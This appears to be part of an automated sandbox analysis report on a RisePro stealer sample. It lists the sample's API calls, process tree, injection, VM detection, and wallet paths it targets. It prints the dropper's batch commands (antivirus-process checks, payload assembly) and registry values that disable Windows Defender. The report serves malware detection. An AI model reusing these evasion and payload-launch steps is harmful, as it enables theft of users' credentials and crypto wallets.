Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0066F445
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0066F5A2
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00663B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00663B4F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CC16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	21_2_006CC16C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C47B7 GetFileAttributesW,FindFirstFileW,FindClose,	21_2_006C47B7
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CCB81 FindFirstFileW,FindClose,	21_2_006CCB81
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CCC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	21_2_006CCC0C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CF445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_006CF445
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CF5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_006CF5A2
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006CF8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	21_2_006CF8A3
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C3B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_006C3B4F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C3E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_006C3E72
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C16000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose,	21_2_00C16000
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C36770 CreateDirectoryA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,	21_2_00C36770
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B81F9C FindClose,FindFirstFileExW,GetLastError,	21_2_00B81F9C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE3F40 SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA,	21_2_00BE3F40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B82022 GetLastError,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	21_2_00B82022

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00615D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

15_2_00615D13

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Thread delayed: delay time: 30101

Jump to behavior

Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}G
Source: Lawyers.pif, 00000015.00000002.3502285683.0000000006176000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}>Y0W
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000001.19041.2006_none_d94bc80de1097097\gdiplus.dlllYrc
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Lawyers.pif, 00000015.00000002.3502285683.0000000006176000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}txt*N
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/7rrP9UK+nYJkDUaruLFsmiax3GAXC2Igj63N1koqBHsy38rIIvg==_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*wT<
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_8D4D65C4
Source: Lawyers.pif, 00000015.00000003.2961599363.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWjS
Source: PixelFlow.pif, 0000000F.00000002.1742294834.00000000039DE000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif, 0000000F.00000003.1735274226.00000000039D7000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif, 0000000F.00000003.1734640266.00000000039CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_006743B9 BlockInput,

15_2_006743B9

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00615240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

15_2_00615240

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00635BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

15_2_00635BDC

Source: C:\Users\user\Desktop\External24.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA102 mov eax, dword ptr fs:[00000030h]	21_2_00BAA102
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA102 mov ecx, dword ptr fs:[00000030h]	21_2_00BAA102
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C186C0 mov eax, dword ptr fs:[00000030h]	21_2_00C186C0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA6B7 mov eax, dword ptr fs:[00000030h]	21_2_00BAA6B7
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA6B7 mov eax, dword ptr fs:[00000030h]	21_2_00BAA6B7
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA6B7 mov eax, dword ptr fs:[00000030h]	21_2_00BAA6B7
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA95B8 mov eax, dword ptr fs:[00000030h]	21_2_00BA95B8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA95B8 mov eax, dword ptr fs:[00000030h]	21_2_00BA95B8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA95B8 mov eax, dword ptr fs:[00000030h]	21_2_00BA95B8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA95B8 mov ecx, dword ptr fs:[00000030h]	21_2_00BA95B8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE5790 mov eax, dword ptr fs:[00000030h]	21_2_00BE5790
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BADB00 mov eax, dword ptr fs:[00000030h]	21_2_00BADB00
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BADB00 mov eax, dword ptr fs:[00000030h]	21_2_00BADB00
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C26280 mov eax, dword ptr fs:[00000030h]	21_2_00C26280
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C1A502 mov eax, dword ptr fs:[00000030h]	21_2_00C1A502
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C1A6B3 mov eax, dword ptr fs:[00000030h]	21_2_00C1A6B3
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C18C58 mov eax, dword ptr fs:[00000030h]	21_2_00C18C58
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C16D80 mov eax, dword ptr fs:[00000030h]	21_2_00C16D80

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_006586B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

15_2_006586B0

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0062A2B5
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062A284 SetUnhandledExceptionFilter,	15_2_0062A284
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0068A2B5
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068A284 SetUnhandledExceptionFilter,	21_2_0068A284
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B84184 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00B84184
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B84311 SetUnhandledExceptionFilter,	21_2_00B84311
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B8451D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00B8451D
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B88A64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00B88A64

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject threads in other processes

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Code function: 21_2_00C1F280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,

21_2_00C1F280

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Registry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Memory written: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif base: B50000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_0065914C LogonUserW,

15_2_0065914C

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00615240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

15_2_00615240

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00661932 SendInput,keybd_event,

15_2_00661932

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_0066507B mouse_event,

15_2_0066507B

Source: C:\Users\user\Desktop\External24.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 292668	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "towersallowancemeaninghelp" Wine	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Therefore + Physical + Inflation + Inspections + Sharon + Lung + Appearance + Warming + Army + Latinas + Anytime + Wiley + Zoning + Cincinnati + Accidents + Helena 292668\r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif 292668\Lawyers.pif 292668\r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif" "C:\Users\user\AppData\Local\PixelFlow Creations\m"	Jump to behavior

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

15_2_006586B0

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00664D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

15_2_00664D89

Source: Lawyers.pif, 0000000A.00000000.1667330345.0000000000715000.00000002.00000001.01000000.00000005.sdmp, Lawyers.pif, 0000000A.00000003.1677686643.00000000047B1000.00000004.00000800.00020000.00000000.sdmp, PixelFlow.pif, 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PixelFlow.pif, Lawyers.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_0062878B cpuid

15_2_0062878B

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,	21_2_00C306D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	21_2_00BA2B5A
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: GetLocaleInfoW,	21_2_00BA2D5F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: EnumSystemLocalesW,	21_2_00BA2EEC

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_0066E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

15_2_0066E0CA

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00640652 GetUserNameW,

15_2_00640652

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_0063409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

15_2_0063409A

Source: C:\Users\user\Desktop\External24.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1	Jump to behavior

Exclude list of file types from scheduled, custom, and real-time scanning

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Registry value created: Exclusions_Extensions 1

Jump to behavior

Modifies Group Policy settings

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

File written: C:\Windows\System32\GroupPolicy\GPT.INI

Jump to behavior

Stealing of Sensitive Information

Yara detected RisePro Stealer

Source: Yara match	File source: 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3035585776.00000000058AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lawyers.pif PID: 2304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Jaxx\Local Storagep
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
